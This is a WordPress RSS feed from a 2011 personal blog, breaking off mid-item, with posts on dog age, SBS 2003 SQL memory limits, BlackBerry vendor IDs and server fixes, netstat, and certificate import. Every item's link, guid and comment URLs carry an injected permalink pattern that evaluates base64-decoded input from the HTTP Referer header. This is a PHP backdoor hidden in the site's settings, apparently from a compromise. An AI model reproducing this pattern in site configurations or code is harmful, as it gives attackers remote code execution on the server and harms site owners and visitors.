<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>apnaguy dot com</title>
	<atom:link href="http://apnaguy.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://apnaguy.com</link>
	<description>blog</description>
	<lastBuildDate>Tue, 04 Oct 2011 07:39:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>determining a dogs age &#8211; the right way</title>
		<link>http://apnaguy.com/2011/10/03/determining-a-dogs-age-the-right-way/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2011/10/03/determining-a-dogs-age-the-right-way/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Tue, 04 Oct 2011 07:39:03 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Day to Day]]></category>
		<category><![CDATA[calculate god age]]></category>
		<category><![CDATA[dog years]]></category>

		<guid isPermaLink="false">http://apnaguy.com/2011/10/03/determining-a-dogs-age-the-right-way/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</guid>
		<description><![CDATA[Was reading an article on Cesars website: http://www.cesarsway.com/dogbehavior/health/Dog-Years The correct way to determine a dogs age is not by multiplying human years by 7, but Subtract two from the age, multiply that by four and add twenty-one. Thanks Cesar!]]></description>
			<content:encoded><![CDATA[<p>Was reading an article on Cesars website:</p>
<p>http://www.cesarsway.com/dogbehavior/health/Dog-Years</p>
<p>The correct way to determine a dogs age is not by multiplying human years by 7, but Subtract two from the age, multiply that by four and add twenty-one. </p>
<p>Thanks Cesar!</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2011/10/03/determining-a-dogs-age-the-right-way/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 2003 SBS high memory usage sqlservr.exe culprit SBSMonitoring</title>
		<link>http://apnaguy.com/2011/09/04/windows-2003-sbs-high-memory-usage-sqlservr-exe-culprit-sbsmonitoring/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2011/09/04/windows-2003-sbs-high-memory-usage-sqlservr-exe-culprit-sbsmonitoring/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Sun, 04 Sep 2011 22:53:08 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[2003sbs]]></category>
		<category><![CDATA[high memory usage]]></category>
		<category><![CDATA[PID]]></category>
		<category><![CDATA[sbs]]></category>
		<category><![CDATA[SBS2003]]></category>
		<category><![CDATA[SBSMonitoring]]></category>
		<category><![CDATA[sqlservr.exe]]></category>
		<category><![CDATA[windows 2003]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=102</guid>
		<description><![CDATA[sqlservr.exe high memory usage for SBSMonitoring process &#160; This seems to be a common issue with my SBS2003 installs. The administrative user will get an E-mail entitled: Allocated Memory Alert on &#8216;ServerName&#8217; which directs you to the process table to find the culprit. In most of my cases I see two hogs. store.exe (Exchange) and sqlservr.exe. [...]]]></description>
			<content:encoded><![CDATA[<h3>sqlservr.exe high memory usage for SBSMonitoring process</h3>
<div>
<p>&nbsp;</p>
<p>This seems to be a common issue with my SBS2003 installs. The administrative user will get an E-mail entitled: <strong>Allocated Memory Alert on &#8216;ServerName&#8217; </strong>which directs you to the process table to find the culprit. In most of my cases I see two hogs. store.exe (Exchange) and sqlservr.exe. We will cover the issues surrounding store.exe in a later post, but for know here are my finding for the sqlservr.exe process. I found the fix in this thread on <a title="DogRiley" href="http://dogriley.blogspot.com/2005/08/sqlservrexe-high-memory-usage-for.html" target="_blank">DogRiley</a> (c/p verbatim)</p>
<p>First verify that the sqlservr process at fault is in fact the SBSMonitoring one. First open Windows Task Manager, choose the processes tab, click the view menu and choose Select Columns. Check the PID column. This will show you the process ID of the entries in the process table. Sort this list by Mem Usage column and get the PID of the offending sqlservr.exe process. The to confirm the PID is SBSMonitoring at a command prompt type:</p>
<blockquote><p>tasklist /svc</p></blockquote>
<p>Look for the PID that matches your memory hog. It will look something like this. My PID was 376:</p>
<blockquote><p>
sqlservr.exe 376 MSSQL$SBSMONITORING</p></blockquote>
<p>If this is the case, you can alter the memory settings for SBSMonitoring process with the following commands from the command line. (Thanks to David Copland)</p>
<p>osql -E -S servername\sbsmonitoring</p>
<blockquote><p>sp_configure &#8216;show advanced options&#8217;,1<br />
reconfigure with override<br />
go<br />
sp_configure &#8216;max server memory&#8217;, nnnn<br />
reconfigure with override<br />
go</p></blockquote>
<p>My session looked like this:</p>
<blockquote><p>C:\Documents and Settings\Administrator&gt;osql -E -S file-server\sbsmonitoring<br />
1&gt; sp_configure &#8216;show advanced options&#8217;,1<br />
2&gt; reconfigure with override<br />
3&gt; go<br />
DBCC execution completed. If DBCC printed error messages, contact your system<br />
administrator.<br />
Configuration option &#8216;show advanced options&#8217; changed from 0 to 1. Run the<br />
RECONFIGURE statement to install.<br />
1&gt; sp_configure &#8216;max server memory&#8217;,100<br />
2&gt; reconfigure with override<br />
3&gt; go<br />
DBCC execution completed. If DBCC printed error messages, contact your system<br />
administrator.<br />
Configuration option &#8216;max server memory (MB)&#8217; changed from 2147483647 to 100.<br />
Run the RECONFIGURE statement to install.<br />
1&gt; quit</p></blockquote>
<p>I set my server to use a maximum of 100MB of memory, and so far all seems well with it. I am planning on adding this to the normal maintenance cycle for all of our supported SBS2003 servers.</p>
<p>Till Next Time,</p></div>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2011/09/04/windows-2003-sbs-high-memory-usage-sqlservr-exe-culprit-sbsmonitoring/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>microsoft security essentials wont load due to malware</title>
		<link>http://apnaguy.com/2011/05/27/microsoft-security-essentials-wont-load-due-to-malware/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2011/05/27/microsoft-security-essentials-wont-load-due-to-malware/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Sat, 28 May 2011 07:21:18 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[microsoft security essentials]]></category>
		<category><![CDATA[mse]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=92</guid>
		<description><![CDATA[http://social.technet.microsoft.com/Forums/en/w7itprosecurity/thread/084209d7-81c7-47f5-85e4-1eb532bac8ba]]></description>
			<content:encoded><![CDATA[<p>http://social.technet.microsoft.com/Forums/en/w7itprosecurity/thread/084209d7-81c7-47f5-85e4-1eb532bac8ba</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2011/05/27/microsoft-security-essentials-wont-load-due-to-malware/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blackberry Vendor ID&#8217;s</title>
		<link>http://apnaguy.com/2011/01/16/blackberry-vendor-ids/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2011/01/16/blackberry-vendor-ids/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Mon, 17 Jan 2011 04:56:07 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Blackberry]]></category>
		<category><![CDATA[carrier]]></category>
		<category><![CDATA[vendor id]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=80</guid>
		<description><![CDATA[Help Screen Blackberry : alt + aA (Shift) +H 100 T-Mobile US 101 AWS 102 Cingular Wireless 103 Nextel 104 Sprint PCS 105 Verizon 106 Alltel 107 Rogers 109 BWA (Aliant/Sasktel) 111 MM02 DE 113 Telfort 114 T-Mobile DE/AU 115 TIM 116 Hutchison 117 Bouygues 118 SFR 119 Orange_France 120 VODAFONE (UK) 121 Telcel 122 [...]]]></description>
			<content:encoded><![CDATA[<p>Help Screen Blackberry : alt + aA (Shift) +H</p>
<p>100 T-Mobile US<br />
101 AWS<br />
102 Cingular Wireless<br />
103 Nextel<br />
104 Sprint PCS<br />
105 Verizon<br />
106 Alltel<br />
107 Rogers<br />
109 BWA (Aliant/Sasktel)<br />
111 MM02 DE<br />
113 Telfort<br />
114 T-Mobile DE/AU<br />
115 TIM<br />
116 Hutchison<br />
117 Bouygues<br />
118 SFR<br />
119 Orange_France<br />
120 VODAFONE (UK)<br />
121 Telcel<br />
122 Telstra<br />
123 T-Mobile (UK)<br />
124 Vodafone Germany<br />
125 MM02 UK/IRL/NL<br />
126 Telus<br />
127 SMART<br />
128 Starhub<br />
129 Telefonica<br />
130 Swisscom<br />
131 Cable &amp; Wireless<br />
132 Vodafone (IT)<br />
133 Vodafone (ES)<br />
134 T-Mobile (NL)<br />
135 Cincinnati Bell<br />
136 Telefonica_LAM<br />
137 Vodafone Austria<br />
138 Vodafone Australia<br />
139 Vodafone Ireland<br />
140 Vodafone Sweden<br />
141 CSL<br />
142 Orange UK<br />
143 Vodafone New Zealand<br />
144 SingTel<br />
145 Globe<br />
146 Optus<br />
147 Orange Mobistar<br />
148 Vodafone_HU<br />
149 Bharti<br />
150 KPN<br />
151 TIM_Greece<br />
152 Proximus<br />
153 Vodafone_Portugal<br />
154 TIM_Brazil<br />
155 BT_Mobile<br />
156 Earthlink<br />
158 E-Plus<br />
159 BASE<br />
160 Dobson<br />
161 Vodafone_Egypt<br />
162 Orange_Switzerland<br />
164 Triton<br />
165 Maxis<br />
166 Vodafone_Denmark_ (TDC)<br />
167 MobileOne_(Voda_ Singapore)<br />
168 Vodacom<br />
169 T-Mobile_PO<br />
170 T-Mobile_CZ<br />
171 T-Mobile_HU<br />
173 MTN<br />
174 Entel<br />
175 Amena<br />
176 SmarTone<br />
177 TCS<br />
178 Avea<br />
179 F100<br />
180 Turkcell<br />
181 Partner<br />
183 Orange_Global<br />
186 Telkomsel<br />
188 Vodafone_Greece<br />
189 USCC<br />
190 Mobilink<br />
194 Voda_Luxembourg<br />
195 Voda_Iceland<br />
198 Vodafone_CZ<br />
204 China_Mobile<br />
205 Movilnet<br />
209 Sympac<br />
210 TIM_Argentina<br />
212 Etisalat<br />
214 AMX<br />
215 Telefonica_Venezuela<br />
217 Orange Romania<br />
218 KTP<br />
222 Mobitel Bulgaria<br />
224 PCCW/Sunday<br />
227 Mobily<br />
229 Eurotel<br />
230 Hutchison India (Hutchison Essar)236 Reliance<br />
237 Verizon<br />
238 Vodafone Turkey<br />
239 Telefonica Morocco (Meditel)<br />
240 Indosat<br />
241 Alcatel Shanghai Bell<br />
245 3-UK/3-Italy/ 3-Sweden/ 3-Denmark/ 3-Austria<br />
247 Vodafone Essar<br />
248 Centennial Wireless/Centennial PR<br />
250 T-Mobile AT (8110 Post HW)<br />
254 Oi Brazil<br />
255 Telecom New Zealand<br />
258 3-Australia (H3GA)<br />
259 Cable Wireless TSTT/TSTT Trinidad and Tobago<br />
269 TATA India<br />
271 T-Mobile Croatia – 4.6 and post/T-Mobile Macedonia/T- Mobile Montenegro<br />
273 BT Italy<br />
274 11<br />
277 MTS Mobility<br />
278 Virgin Mobile<br />
280 Orange Slovakia – 8120 Post<br />
282 Taiwan Mobile<br />
285 Orange Austria (ONE) (Full Launch)286 Vodafone Malta<br />
288 BASE (JiM)<br />
295 CMCC Peoples<br />
298 Digitel (FULL LAUNCH)<br />
300 Solo (Bell)<br />
301 Carphone Warehouse Spain/Carphone Warehouse UK/Carphone Warehouse France/Carphone Warehouse NL<br />
302 Cable &amp; Wireless UK/20:20 UK/20:20 France/20:20 Germany/Brightpoint Germany/Brightpoint UK/Brightstar AZLAN DE/LuxGSM/Brightstar AZLAN UK/Brightstar AZLAN FR/Poste Mobile<br />
303 Iusacell Mexico<br />
308 XL Indonesia<br />
309 Fido Solutions<br />
310 Wind Italy<br />
315 Metro PCS<br />
316 Nextel International – Mexico<br />
317 Nextel International – Peru<br />
318 Nextel International – Brazil<br />
319 Nextel International – Argentina<br />
322 Vodafone Qatar<br />
324 Etisalat Misr<br />
326 Brightpoint Australia<br />
327 Axis<br />
331 Bell Mobility<br />
332 Telus<br />
335 STC Saudi Arabia<br />
336 Q-Tel<br />
337 Phone House France<br />
339 Phone House Germany<br />
340 Phone House Netherlands<br />
352 3-Indonesia<br />
353 Millicom (TIGO) – Bolivia/Millicom (TIGO) – Honduras/Millicom (TIGO) – Guatemala/Millicom (TIGO)-El Salvador/Millicom (TIGO) – Colombia/Millicom (TIGO) – Paraguay<br />
369 3-Italy<br />
370 Globalive<br />
373 Digicel<br />
375 Orange Dominicana<br />
376 DTAC<br />
377 IDEA<br />
378 HK Regional PRD<br />
381 Virgin Mobile UK<br />
382 AMX Comcel Colombia<br />
383 AMX Porta Ecuador<br />
384 AMX Claro Argentina<br />
385 AMX Claro Brazil<br />
388 3-Austria<br />
389 Boost Mobile<br />
392 Virgin Mobile<br />
395 BR Regional PRD<br />
416 VE Regional PRD<br />
600 Wataniya Kuwait/GO Mobile/Mobinil/Warid/Etisalat Nigeria/Oman Mobile/Zain Jordan/Telenor Pakistan/Mobilecom/Zain Nigeria/Zain Malawi/Cellplus/Batelco/GeoCell/Zain Kuwait/Ufone/EMS/Emtel/Nawras<br />
601 Zain Madagascar/20:20 France/Brightpoint France/Zain Congo<br />
602 AzerCell<br />
603 Jersey Telecom/Trigcom/Telenor Serbia/Siminn/Brightpoint UK/Sonofon/Mobitel/Telenor Hungary/Brightpoint Netherlands/Brightstar AZLAN UK/Cable &amp; Wireless UK/20:20 UK/Globul/Polkomtel/Optimus/TMN Portugal/Telenor Norway<br />
604 Sunrise/Brightstar_AZLAN DE (Gemini Onwards)/20:20 Germany/Brightpoint Germany<br />
605 Cosmote Greece<br />
609 MPulse/DiGi/Docomo Pacific<br />
610 AIS Thailand/True Move<br />
611 Aircel/Redington/MTNL/Loop Mobile/BSNL<br />
612 Mobility/West Central Wireless/SETAR/Celluar One/UTS<br />
613 brightpoint/TAM</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2011/01/16/blackberry-vendor-ids/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>how to check what ports your computer is listening on</title>
		<link>http://apnaguy.com/2010/12/02/how-to-check-what-ports-your-computer-is-listening-on/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2010/12/02/how-to-check-what-ports-your-computer-is-listening-on/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Fri, 03 Dec 2010 07:18:09 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[listeining]]></category>
		<category><![CDATA[netstat]]></category>
		<category><![CDATA[ports]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=70</guid>
		<description><![CDATA[netstat -an &#124;find /i &#8220;listening&#8221;]]></description>
			<content:encoded><![CDATA[<p>netstat -an |find /i &#8220;listening&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2010/12/02/how-to-check-what-ports-your-computer-is-listening-on/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Can Amer Freight</title>
		<link>http://apnaguy.com/2010/11/09/can-amer-freight/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2010/11/09/can-amer-freight/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Wed, 10 Nov 2010 01:19:04 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Day to Day]]></category>
		<category><![CDATA[Blaine WA]]></category>
		<category><![CDATA[Can Amer Freight]]></category>
		<category><![CDATA[Can Amer Shipping]]></category>
		<category><![CDATA[ebay shipping in blaine washington for canada]]></category>
		<category><![CDATA[new address for Can Amer]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=68</guid>
		<description><![CDATA[Just thought I&#8217;d throw a shout out to a shipping/receiving company I use in Blaine, Washington. Just a hop skip and a jump to pick up your parcels that you purchased online from ebay, etc. It is so much cheaper to have it shipped within USA then have it shipped across the border. Not to [...]]]></description>
			<content:encoded><![CDATA[<p>Just thought I&#8217;d throw a shout out to a shipping/receiving company I use in Blaine, Washington. Just a hop skip and a jump to pick up your parcels that you purchased online from ebay, etc. It is so much cheaper to have it shipped within USA then have it shipped across the border. Not to mention if your package gets held up at customs, good luck with that.. this way you have a pretty good chance of driving it back personally. I have never once lied to the border guards, and always get through without any charges -taxes or duties..<br />
the place I use is called:</p>
<p><strong>Can Amer Freight</strong> (aka Can Amer Shipping &amp; Receiving)<br />
1927 Boblett St<br />
Blaine, Washington 98230<br />
Phone: 360-332-6525</p>
<p>I put this on my blog as mostly all websites, even yellowpages.com still show their old address on yew st. You should update your records.</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2010/11/09/can-amer-freight/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blackberry Administration Service Page not found</title>
		<link>http://apnaguy.com/2010/08/22/blackberry-administration-service-page-not-found/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2010/08/22/blackberry-administration-service-page-not-found/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Mon, 23 Aug 2010 04:11:49 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[blackberry administration service]]></category>
		<category><![CDATA[blackberry administration service high cpu load]]></category>
		<category><![CDATA[blackberry administration service page not found]]></category>
		<category><![CDATA[blackberry enterprise server]]></category>
		<category><![CDATA[blackberry enterprise server express 5.0.2]]></category>
		<category><![CDATA[page can not be found]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=66</guid>
		<description><![CDATA[New installation of BES-X on SBS 2003 Server. Installation all went through OK, however cannot administer the BES-X server as IE admin page blank. Discovered the The BlackBerry Administration Service &#8211; Application Server service keeps failing. It will start and chew up lots of CPU time &#38; memory but then stop after approx. 1 minute, [...]]]></description>
			<content:encoded><![CDATA[<p>New installation of BES-X on SBS 2003 Server.</p>
<p>Installation all went through OK, however cannot administer the BES-X server as IE admin page blank.</p>
<p>Discovered the The BlackBerry Administration Service &#8211; Application Server service keeps failing.</p>
<p>It will start and chew up lots of CPU time &amp; memory but then stop after approx. 1 minute, (BAS-AS.exe will disappear from task manager).</p>
<p>Event Viewer says:</p>
<p>The BlackBerry Administration Service &#8211; Application Server service terminated unexpectedly.</p>
<p>BBAS-AS logs mention these which may be of note:</p>
<p>[WARN] Problem starting service jboss:service=RIM_BES_BAS_HA_33879984_SBSSVR<br />
org.jgroups.ChannelException: failed to start protocol stack (03/30 12:39:17:843):{main} [org.jboss.system.ServiceController] [WARN] Problem starting service jboss.cache:service=EJB3EntityTreeCache<br />
org.jgroups.ChannelException: failed to start protocol stack</p>
<p>Resolution:</p>
<p>Although I have found four or five different issues that can cause this, the resolutuion below was hardly documented anywhere on the internet.</p>
<p>I got this working by going into the registry and reserving the following ports: 48858, 48857, 48855, 45588, 49955, 45599</p>
<p>Click <strong>Start</strong>, click <strong>Run</strong>, type regedit, and then click <strong>OK</strong>.</p>
<p>Locate and then click the following subkey:</p>
<p><strong>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters </strong></p>
<p>Right-click <strong>ReservedPorts</strong>, and then click <strong>Modify</strong>.</p>
<p>Paste the following at the bottom</p>
<p>1433-1434<br />
3443-3443<br />
4070-4071<br />
48855-48858<br />
45588-45588<br />
49955-49955<br />
45599-45599</p>
<p>Restart the server</p>
<p>I found this after a complete uninstall and reinstall of Blackberry Enterprise Express 5.0.2.</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2010/08/22/blackberry-administration-service-page-not-found/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to configure BlackBerry MDS Connection Service to perform certificate searches using LDAPS</title>
		<link>http://apnaguy.com/2010/08/09/how-to-configure-blackberry-mds-connection-service-to-perform-certificate-searches-using-ldaps/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2010/08/09/how-to-configure-blackberry-mds-connection-service-to-perform-certificate-searches-using-ldaps/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 06:22:50 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[bes]]></category>
		<category><![CDATA[Blackberry]]></category>
		<category><![CDATA[certificate searches]]></category>
		<category><![CDATA[LDAPS]]></category>
		<category><![CDATA[mds connector service]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=60</guid>
		<description><![CDATA[How to configure the BlackBerry MDS Connection Service to enable certificate searching using Lightweight Directory Access Protocol (LDAP) certificate server. Task 1 &#8211; Configure the MDS Connection Service   BlackBerry Enterprise Server 4.1 Enter the LDAP certificate server host name. Enter the LDAP certificate server port configured on the LDAP certificate server. The default is [...]]]></description>
			<content:encoded><![CDATA[<p>How to configure the BlackBerry MDS Connection Service to enable certificate searching using Lightweight Directory Access Protocol (LDAP) certificate server.</p>
<h3>Task 1 &#8211; Configure the MDS Connection Service</h3>
<p> </p>
<p class="subHeading">BlackBerry Enterprise Server 4.1</p>
<ol>
<li>Enter the LDAP certificate server host name.</li>
<li>Enter the LDAP certificate server port configured on the LDAP certificate server. The default is 636.</li>
<li>Enter the Microsoft® Active Directory® account and password that has permission to query the LDAP certificate server.</li>
<li>Enter a default base query.</li>
<li>Amend the query limit and data compression settings if necessary.</li>
</ol>
<p> </p>
<p class="subHeading">BlackBerry Enterprise Server version 5.0</p>
<ol>
<li>Open the BlackBerry Administration Service.</li>
<li>Navigate to <strong>BlackBerry Solution topology &gt; BlackBerry Domain &gt; Component view &gt; Edit (MDS Connection Service) &gt; LDAP.</strong></li>
<li>Enter the LDAP certificate server host name and port in the <strong>Service URL</strong> field in the format:
<ul>
<li>Hostname:Port</li>
</ul>
</li>
<li>Set <strong>Secure connection enabled</strong> to <strong>Yes.</strong></li>
<li>Click <strong>Save All.</strong></li>
<li>Navigate to <strong>BlackBerry Solution topology &gt; BlackBerry Domain &gt; Component view &gt; Edit (MDS Connection Service) &gt; Configuration sets.</strong></li>
<li>Add the LDAP configuration to a new or existing configuration set.</li>
<li>Click <strong>Save all.</strong></li>
<li>Navigate to each BlackBerry MDS Connection Service instance in <strong>BlackBerry Solution topology &gt; BlackBerry Domain &gt; Component view &gt; MDS Connection Service &gt; Edit (Servername_MDS-CS_x) &gt; Component Configuration Sets</strong> and specify the configuration set that a BlackBerry MDS Connection Service instance will use.</li>
<li>Click <strong>Save all.</strong></li>
</ol>
<p> </p>
<h3>Task 2 &#8211; Amend rimpublic.property file</h3>
<ol>
<li>In <span style="font-family: Courier New;">C:\Program Files\Research In Motion\BlackBerry Enterprise Server\MDS\Servers\&lt;SERVER_NAME&gt;\config, </span>open <strong>rimpublic.property</strong>.</li>
<li>Add <span style="font-family: Courier New;">Adding application.handler.ldap.DEFAULT_USE_SSL_TLS=true</span>.</li>
<li>Save.</li>
</ol>
<h3>Task 3 &#8211; Restart the BlackBerry MDS Connection Service to allow the changes to MDS_CS and rimpublic.property to apply.</h3>
<h3>Task 4 &#8211; Import company root certificate to the MDS keystore.</h3>
<p>Refer to <a href="http://www.blackberry.com/btsc/KB11623" target="_blank">KB11623</a> &#8211; How to add a certificate for the web server to the BlackBerry MDS or BlackBerry MDS Keystore &#8211; and add the root certificate to the BlackBerry MDS keystore.</p>
<p>If the root certificate does not contain a CRL distribution point entry it will be necessary to add Intermediate certificates to the BlackBerry MDS keystore.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>How to add a certificate for the web server to the BlackBerry Mobile Data Service or BlackBerry MDS keystore</p>
<div style="display: block; padding: 10px;">
<div id="docFunctions"><a onclick="collapseAll(getElements('overview,environment,additional_information'),getImages('imgoverview,imgenvironment,imgadditional_information'));" href="http://apnaguy.com/wp-admin/#">Collapse all </a>| <a onclick="expandAll(getElements('overview,environment,additional_information'),getImages('imgoverview,imgenvironment,imgadditional_information'));" href="http://apnaguy.com/wp-admin/#">Expand all </a></div>
<div id="jumpTo">Jump to: <a href="http://apnaguy.com/wp-admin/#overviewSection">Overview</a> | <a href="http://apnaguy.com/wp-admin/#environmentSection">Environment</a> | <a href="http://apnaguy.com/wp-admin/#additional_informationSection">Additional Information</a></div>
<div class="heading" onclick="toggle('overview','imgoverview');"><img id="imgoverview" style="vertical-align: text-bottom;" src="http://www.blackberry.com/btsc/RIMCUST/img/newTemplate/minus.png" alt="Collapse" /><a name="overviewSection"></a>Overview</div>
<hr class="section" />
<div id="overview" class="section">
<p>The <strong>cacerts</strong> file is a keystore with certificate authority (CA) certificates, and it includes multiple trusted root CA certificates, such as VeriSign®. For the BlackBerry® Mobile Data System (MDS) or BlackBerry MDS Connection Service to trust a web server, the BlackBerry MDS Connection Service must check that the web server certificate with the certificate authority. If the web server certificate is purchased from a trusted certificate authority, the check is successful because the issuer&#8217;s root CA certificate is in the <strong>cacerts</strong> file by default. If a private certificate authority is used to issue the web site certificate, the check fails and access to the website from the BlackBerry smartphone is either denied or a prompt to trust the certificate appears on the BlackBerry smartphone screen. Any of the following can be done in order to change this behaviour and to allow the BlackBerry smartphone to access the website successfully:</p>
<ul>
<li>Import the private certificate authority&#8217;s root CA certificate and any relevant intermediate certificates into the <strong>cacerts</strong> file.</li>
<li>Import the web server certificate into the <strong>cacerts</strong> file.</li>
</ul>
<p><strong>Note:</strong> The BlackBerry MDS is included with BlackBerry Enterprise Server 3.6 to 4.0. BlackBerry MDS Connection Service is included with BlackBerry Enterprise Server 4.1 to 4.1 SP7.</p>
<p>To import the certificate into the <strong>cacerts</strong> file, complete the following tasks:</p>
<h3>Task 1 &#8211; Check which version of JRE is used by the BlackBerry MDS or BlackBerry MDS Connection Service</h3>
<p>As multiple versions of the JRE can be installed on a server, it is necessary to check which version is currently in use by the BlackBerry MDS or BlackBerry MDS Connection Service.</p>
<p>Perform the following steps to do so:</p>
<ol>
<li>Open the Windows Services®<strong> </strong>snap-in.</li>
<li>Open properties of the <strong>BlackBerry MDS Connection Service</strong>.</li>
<li>On <strong>General </strong>tab in <strong>Path to executable </strong>find the value of <strong>jvmpath </strong>parameter. It is populated with a path to the JRE in use. See the following example:<span style="font-family: Courier New;">jvmpath=&#8221;C:\Program Files\Java\jre1.6.0_15\bin\client\jvm.dll&#8221;</span></li>
<li>Write down part of the path which points to the JRE installation directory. See the following example:<span style="font-family: Courier New;">C:\Program Files\Java\jre1.6.0_15</span></li>
</ol>
<h3>Task 2 &#8211; Add a certificate to the BlackBerry MDS or BlackBerry MDS-CS certificate store</h3>
<p><strong>Note:</strong> The default keystore password is <strong>changeit</strong>. The <strong>aliasname </strong>used in the following commands must be unique.</p>
<p>To add a certificate to the BlackBerry MDS or BlackBerry MDS Connection Service certificate store, complete the following steps:</p>
<ol>
<li>Copy the <strong>certificatename.cer</strong> file to <span style="font-family: Courier New;">&lt;PATH_FROM_TASK1_STEP4&gt;\lib\security</span></li>
<li>Type the following commands in the command prompt:<span style="font-family: Courier New;">cd &lt;PATH_FROM_TASK1_STEP4&gt;\bin</span>
<p><span class="code">keytool -import -trustcacerts -alias aliasname -file ..\lib\security\certificateName.cer -keystore ..\lib\security\cacerts</span></li>
<li>Check that the <strong>cacerts</strong> file contains the updated information for the new alias and certificate:
<p class="code">keytool -list -v -keystore ..\lib\security\cacerts</p>
</li>
<li>Restart the BlackBerry MDS or BlackBerry MDS Connection Service for the changes to take effect.</li>
</ol>
<ul>
<li class="backTop"><a href="http://apnaguy.com/wp-admin/#documentTop">Back to top</a></li>
</ul>
</div>
